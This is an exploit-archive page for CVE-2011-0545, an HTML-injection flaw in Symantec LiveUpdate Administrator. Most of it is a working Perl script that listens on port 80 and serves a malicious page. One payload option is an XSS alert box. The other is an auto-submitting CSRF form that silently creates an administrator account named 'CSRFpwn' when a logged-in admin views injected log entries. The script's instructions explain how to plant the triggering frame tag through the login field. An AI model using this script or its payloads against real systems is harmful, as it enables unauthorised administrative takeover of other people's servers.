ExploitFixes
Symantec LiveUpdate Administrator Management GUI HTML Injection - [CVE: 2011-0545] 2011-03-23 09:15:14

Source: http://www.securityfocus.com/bid/46856/info

Symantec LiveUpdate Administrator is prone to an HTML-injection vulnerability.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.


#!/usr/bin/perl

##
# Title: Symantec Live Update Administrator CSRF Exploit
# Name: luaCSRF.pl
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
#
##


use Socket;
use IO::Handle;
use Getopt::Std;

my %args;
getopt('g:h:', \%args);

my $payload = $args{g} || usage();
my $victim = $args{h} || usage();

banner();

if ($payload eq "1") {
print "[+] Using the Alert Box payload\n";
# Alert Box
$html = <<ENDHTML;
<html>
<SCRIPT LANGUAGE="JavaScript">alert('!!!XSS/CSRF vulnerability!!!')</SCRIPT>
</html>

ENDHTML

} elsif ($payload eq "2") {
print "[+] Using the add admin user payload\n";
# Adds the user CSRFpwn with password 12345678
$html = <<ENDHTML;
<html>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://$victim:7070/lua/adduser.do" method="post">
<input type="hidden" name="dispatch" value="save" />
<input type="hidden" name="username" value="CSRFpwn" />
<input type="hidden" name="password" value="12345678"/>
<input type="hidden" name="verifyPassword" value="12345678"/>
<input type="hidden" name="lastname" value="junk" />
<input type="hidden" name="firstname" value="junk" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="userRole" value="1" />
</form>
</body>
</html>

ENDHTML

}

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "[-] socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "[-] Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in(80,INADDR_ANY);
bind(SOCK,$my_addr) or die "[-] bind() failed: $!";
listen(SOCK,SOMAXCONN) or die "[-] listen() failed: $!";
warn "[+] waiting for incoming connections on port 80...\n";
warn "[+] Enter the following String in the LUA username login field\n";
warn "[+] (e.q. HTTP/SSH) and wair for the admin to view the Logs\n";
warn "[+]\n";
warn "[+] <frame src=http://<LOCAL_ADDRESS>/.html>\n";

$repeat = 1;
$victim = inet_aton("0.0.0.0");
while($repeat) {
my $remote_addr = accept(SESSION,SOCK);
my ($port,$hisaddr) = sockaddr_in($remote_addr);
warn "[+] Connection from [",inet_ntoa($hisaddr),",$port]\n";
$victim = $hisaddr;
SESSION->autoflush(1);
if(<SESSION>) {
print SESSION $http_header . $html;
}
warn "[+] Connection from [",inet_ntoa($hisaddr),",$port] finished\n";
close SESSION;
}

sub usage {
print $payload;
print "\n";
print " luaCSRF.pl - Symantec LUA CSRF Exploit\n";
print "===============================================================\n\n";
print " Usage:\n";
print " $0 -g <payload> -h <lua-ip>\n";
print " Optional:\n";
print " -p <local port to listen on>\n";
print " -g (1|2) <payload to use>\n";
print " 1 <Execute an alert box\n";
print " 2 <Add the Admin User \"CSRFpwn\">\n";
print " Notes:\n";
print " -nothing here\n";
print "\n";
print " Author:\n";
print " Nikolas Sotiriu (lofi)\n";
print " url: www.sotiriu.de\n";
print " mail: lofi[at]sotiriu.de\n";
print "\n";


exit(1);
}

sub banner {
print STDERR << "EOF";
--------------------------------------------------------------------------------
luaCSRF.pl - Symantec LUA CSRF Exploit
--------------------------------------------------------------------------------

111 1111111
11100 101 00110111001111
11101 11 10 111 101 1001111111
1101 11 00 10 11 11 111 1111111101
10111 1 10 11 10 0 10 1 1 1 1111111011
1111 1 1 10 0 01 01 01 1 1 111 1111011101
1000 0 11 10 10 0 10 11 111 11111 11 1111 111100
1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11
10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111
101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111
011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001
1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001
1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101
011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01
1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111
111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111
111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001
111 1011111 1 11111111110111111111111111111111111111111 01 10111001
11 1100 10110110 10001 11101111111111111111 10 111 11100
111 00 1011101 00101 0 11111111111111111001 11 111101
11 00 00 101 1000011 1011 1111 1111111000 1111111 0
11 00 0 1011 100001 101000 1 1001 00001111 01
01101 11111 1011 01100 0101 110 11 10
10111 1 0 01 0000011 10 10
10011 11100 1111 101 11
1110 01 101011 1001100
1111000011 1 111
11000001111
1

EOF
}